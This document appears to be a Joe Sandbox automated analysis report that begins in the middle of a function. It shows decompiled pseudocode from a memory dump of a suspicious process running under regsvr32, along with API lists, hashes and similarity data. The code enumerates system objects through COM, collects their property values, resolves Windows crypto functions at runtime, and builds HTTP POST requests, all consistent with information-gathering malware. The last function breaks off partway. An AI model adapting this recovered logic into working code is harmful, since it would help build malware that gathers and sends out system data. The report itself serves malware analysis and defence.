				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0499E400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E04998BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E04998BF4( &_v60, 0xfffffffe);
					E0499E4B4( &_v104);
					return _t320;
				}
				_t165 = E04999DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E04999DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04999A5A(_t165);
				_v60 = _t322;
				E04998BAF( &_v52);
				E04998BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E04999DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04998BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E04998BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E049998BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E049998BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E04998C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04998BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E04998BF4(_t136, 0);
								E04998BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E049998BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E04999DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E04999DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04998BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E04998BAF( &_v92);
											E04998BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E04999E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04998BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E04999DF2(_t283, 0xe0a);
										E04999E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E04998BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E049998BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0499E92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E04998BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                              0x0499ea53
                                                                                                                                                                                              0x0499ea59
                                                                                                                                                                                              0x0499ea60
                                                                                                                                                                                              0x0499ea63
                                                                                                                                                                                              0x0499ea66
                                                                                                                                                                                              0x0499ea6b
                                                                                                                                                                                              0x0499ea6d
                                                                                                                                                                                              0x0499ea72
                                                                                                                                                                                              0x0499eeba
                                                                                                                                                                                              0x0499eeba
                                                                                                                                                                                              0x0499ea7f
                                                                                                                                                                                              0x0499ea81
                                                                                                                                                                                              0x0499ea84
                                                                                                                                                                                              0x0499ea87
                                                                                                                                                                                              0x0499ee9f
                                                                                                                                                                                              0x0499eea5
                                                                                                                                                                                              0x0499eeaf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eeb4
                                                                                                                                                                                              0x0499ea92
                                                                                                                                                                                              0x0499ea99
                                                                                                                                                                                              0x0499eaa0
                                                                                                                                                                                              0x0499eaa3
                                                                                                                                                                                              0x0499eaa8
                                                                                                                                                                                              0x0499eaaa
                                                                                                                                                                                              0x0499eaad
                                                                                                                                                                                              0x0499eab0
                                                                                                                                                                                              0x0499eab1
                                                                                                                                                                                              0x0499eaba
                                                                                                                                                                                              0x0499eac0
                                                                                                                                                                                              0x0499eac3
                                                                                                                                                                                              0x0499eacc
                                                                                                                                                                                              0x0499ead1
                                                                                                                                                                                              0x0499ead6
                                                                                                                                                                                              0x0499eaed
                                                                                                                                                                                              0x0499eafa
                                                                                                                                                                                              0x0499eafd
                                                                                                                                                                                              0x0499eb04
                                                                                                                                                                                              0x0499eb09
                                                                                                                                                                                              0x0499eb10
                                                                                                                                                                                              0x0499eb15
                                                                                                                                                                                              0x0499eb1c
                                                                                                                                                                                              0x0499eb1e
                                                                                                                                                                                              0x0499eb2a
                                                                                                                                                                                              0x0499eb2d
                                                                                                                                                                                              0x0499eb2f
                                                                                                                                                                                              0x0499ee8f
                                                                                                                                                                                              0x0499ee90
                                                                                                                                                                                              0x0499ee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee99
                                                                                                                                                                                              0x0499eb35
                                                                                                                                                                                              0x0499eb38
                                                                                                                                                                                              0x0499eb3b
                                                                                                                                                                                              0x0499eb3e
                                                                                                                                                                                              0x0499eb40
                                                                                                                                                                                              0x0499ee5b
                                                                                                                                                                                              0x0499ee5e
                                                                                                                                                                                              0x0499ee61
                                                                                                                                                                                              0x0499ee63
                                                                                                                                                                                              0x0499ee85
                                                                                                                                                                                              0x0499ee8a
                                                                                                                                                                                              0x0499ee65
                                                                                                                                                                                              0x0499ee68
                                                                                                                                                                                              0x0499ee73
                                                                                                                                                                                              0x0499ee7a
                                                                                                                                                                                              0x0499ee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb46
                                                                                                                                                                                              0x0499eb46
                                                                                                                                                                                              0x0499eb58
                                                                                                                                                                                              0x0499eb5b
                                                                                                                                                                                              0x0499eb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb65
                                                                                                                                                                                              0x0499eb68
                                                                                                                                                                                              0x0499eb6b
                                                                                                                                                                                              0x0499eb6e
                                                                                                                                                                                              0x0499eb71
                                                                                                                                                                                              0x0499eb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb7a
                                                                                                                                                                                              0x0499eb88
                                                                                                                                                                                              0x0499eb8b
                                                                                                                                                                                              0x0499eb8d
                                                                                                                                                                                              0x0499eba6
                                                                                                                                                                                              0x0499ebb5
                                                                                                                                                                                              0x0499ebbd
                                                                                                                                                                                              0x0499ebbd
                                                                                                                                                                                              0x0499ebc0
                                                                                                                                                                                              0x0499ebc7
                                                                                                                                                                                              0x0499ebcb
                                                                                                                                                                                              0x0499ebd1
                                                                                                                                                                                              0x0499ebd3
                                                                                                                                                                                              0x0499ee43
                                                                                                                                                                                              0x0499ee49
                                                                                                                                                                                              0x0499ee4f
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x0499ebe2
                                                                                                                                                                                              0x0499ebf6
                                                                                                                                                                                              0x0499ebfa
                                                                                                                                                                                              0x0499ebfc
                                                                                                                                                                                              0x0499ec01
                                                                                                                                                                                              0x0499ee10
                                                                                                                                                                                              0x0499ee16
                                                                                                                                                                                              0x0499ee21
                                                                                                                                                                                              0x0499ee2c
                                                                                                                                                                                              0x0499ee32
                                                                                                                                                                                              0x0499ee38
                                                                                                                                                                                              0x0499ee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee3b
                                                                                                                                                                                              0x0499ec07
                                                                                                                                                                                              0x0499edde
                                                                                                                                                                                              0x0499edde
                                                                                                                                                                                              0x0499ede1
                                                                                                                                                                                              0x0499ede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec0f
                                                                                                                                                                                              0x0499ec17
                                                                                                                                                                                              0x0499ec1e
                                                                                                                                                                                              0x0499ec24
                                                                                                                                                                                              0x0499ec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec2f
                                                                                                                                                                                              0x0499ec44
                                                                                                                                                                                              0x0499ec4a
                                                                                                                                                                                              0x0499ec53
                                                                                                                                                                                              0x0499ec56
                                                                                                                                                                                              0x0499ec59
                                                                                                                                                                                              0x0499ec5b
                                                                                                                                                                                              0x0499edd1
                                                                                                                                                                                              0x0499edd4
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x0499ec6b
                                                                                                                                                                                              0x0499ec6e
                                                                                                                                                                                              0x0499ec75
                                                                                                                                                                                              0x0499ec7b
                                                                                                                                                                                              0x0499ec7e
                                                                                                                                                                                              0x0499ec81
                                                                                                                                                                                              0x0499ec84
                                                                                                                                                                                              0x0499ec87
                                                                                                                                                                                              0x0499ecc3
                                                                                                                                                                                              0x0499ecc3
                                                                                                                                                                                              0x0499ecc6
                                                                                                                                                                                              0x0499ed72
                                                                                                                                                                                              0x0499ed86
                                                                                                                                                                                              0x0499ed96
                                                                                                                                                                                              0x0499ed9a
                                                                                                                                                                                              0x0499ed9c
                                                                                                                                                                                              0x0499edb3
                                                                                                                                                                                              0x0499edb7
                                                                                                                                                                                              0x0499edc0
                                                                                                                                                                                              0x0499edcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499edcb
                                                                                                                                                                                              0x0499eda2
                                                                                                                                                                                              0x0499eda3
                                                                                                                                                                                              0x0499eda8
                                                                                                                                                                                              0x0499eda8
                                                                                                                                                                                              0x0499edaa
                                                                                                                                                                                              0x0499edab
                                                                                                                                                                                              0x0499edb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499edb0
                                                                                                                                                                                              0x0499eccc
                                                                                                                                                                                              0x0499eccc
                                                                                                                                                                                              0x0499eccf
                                                                                                                                                                                              0x0499ed3a
                                                                                                                                                                                              0x0499ed4e
                                                                                                                                                                                              0x0499ed5e
                                                                                                                                                                                              0x0499ed62
                                                                                                                                                                                              0x0499ed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ed6a
                                                                                                                                                                                              0x0499ed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ed6b
                                                                                                                                                                                              0x0499ecd1
                                                                                                                                                                                              0x0499ecd1
                                                                                                                                                                                              0x0499ecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ecd6
                                                                                                                                                                                              0x0499ecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ecdb
                                                                                                                                                                                              0x0499ecdb
                                                                                                                                                                                              0x0499ece1
                                                                                                                                                                                              0x0499ecfd
                                                                                                                                                                                              0x0499ed0c
                                                                                                                                                                                              0x0499ed15
                                                                                                                                                                                              0x0499ed1a
                                                                                                                                                                                              0x0499ed1d
                                                                                                                                                                                              0x0499ed23
                                                                                                                                                                                              0x0499ed23
                                                                                                                                                                                              0x0499ed28
                                                                                                                                                                                              0x0499ed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ed34
                                                                                                                                                                                              0x0499ece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ece6
                                                                                                                                                                                              0x0499ec89
                                                                                                                                                                                              0x0499ecb0
                                                                                                                                                                                              0x0499ecb5
                                                                                                                                                                                              0x0499ecba
                                                                                                                                                                                              0x0499ecbc
                                                                                                                                                                                              0x0499ecbc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ecba
                                                                                                                                                                                              0x0499ec8b
                                                                                                                                                                                              0x0499ec8b
                                                                                                                                                                                              0x0499ec8e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec94
                                                                                                                                                                                              0x0499ec94
                                                                                                                                                                                              0x0499ec97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec9d
                                                                                                                                                                                              0x0499ec9d
                                                                                                                                                                                              0x0499eca0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eca6
                                                                                                                                                                                              0x0499eca9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ecab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ecab
                                                                                                                                                                                              0x0499eded
                                                                                                                                                                                              0x0499edf3
                                                                                                                                                                                              0x0499edf9
                                                                                                                                                                                              0x0499edfc
                                                                                                                                                                                              0x0499edff
                                                                                                                                                                                              0x0499edff
                                                                                                                                                                                              0x0499ee02
                                                                                                                                                                                              0x0499ee03
                                                                                                                                                                                              0x0499ee06
                                                                                                                                                                                              0x0499ee08
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee58
                                                                                                                                                                                              0x0499ee58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee58
                                                                                                                                                                                              0x0499eb8f
                                                                                                                                                                                              0x0499eb95
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb95
                                                                                                                                                                                              0x0499ee55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ead8
                                                                                                                                                                                              0x0499eadd
                                                                                                                                                                                              0x0499eae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eae6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E413
                                                                                                                                                                                                • Part of subcall function 0499E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E424
                                                                                                                                                                                                • Part of subcall function 0499E400: CoCreateInstance.OLE32(049AC868,00000000,00000001,049AC878,?,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E43B
                                                                                                                                                                                                • Part of subcall function 0499E400: SysAllocString.OLEAUT32(00000000), ref: 0499E446
                                                                                                                                                                                                • Part of subcall function 0499E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E471
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499EAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499EB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499EE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499EE99
                                                                                                                                                                                                • Part of subcall function 04998BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04998C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 62f22f95b8cb982c798e81d2837e59683786d9c3988296bbbb305e4b14443aef
                                                                                                                                                                                              • Instruction ID: f34a630d5b38bb6eb83c7da41b55896857655104668efd7c3919ed08ee64c782
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f22f95b8cb982c798e81d2837e59683786d9c3988296bbbb305e4b14443aef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE11DB1E00219AFDF14EFA8C884AAEBBF9FF49304F184469E505A7294DB75BD41CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A28F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E049A28F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E049A284B( &_v16);
				return 0;
			}











                                                                                                                                                                                              0x049a28f6
                                                                                                                                                                                              0x049a2908
                                                                                                                                                                                              0x049a290c
                                                                                                                                                                                              0x049a2980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a2982
                                                                                                                                                                                              0x049a291c
                                                                                                                                                                                              0x049a2920
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a2928
                                                                                                                                                                                              0x049a292a
                                                                                                                                                                                              0x049a292f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a2939
                                                                                                                                                                                              0x049a293d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a293f
                                                                                                                                                                                              0x049a2944
                                                                                                                                                                                              0x049a2946
                                                                                                                                                                                              0x049a2948
                                                                                                                                                                                              0x049a294d
                                                                                                                                                                                              0x049a2952
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a295d
                                                                                                                                                                                              0x049a2967
                                                                                                                                                                                              0x049a296b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a297a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04997B6A), ref: 049A2902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 049A291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049A2928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049A2937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 2a6774ca7d7521d058a1a357dd58963fce700489981d36a55f365fa3f61c1e0c
                                                                                                                                                                                              • Instruction ID: f203cee2409d010c11920e241ec7c0dd840878fbdb44c662570ca9357c52def7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6774ca7d7521d058a1a357dd58963fce700489981d36a55f365fa3f61c1e0c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01118272A4131A77DB11D7A49D41F9EB6ACAFC4B54F1504B0FA00F6240EA70FA118BE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499F7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E0499F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E04999DD8(0xd62);
				_v52 = E04999DD8(0x8e9);
				_v48 = E04999DD8(0xa93);
				_v44 = E04999DD8(0x9a9);
				_t94 = E04999DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E04998D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0499A43D(_t190));
				_t102 =  *0x49af838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x49af838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x49af920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0499F73E(_t189);
							_t110 =  *0x49af838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0499A065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x49af838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0499A065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
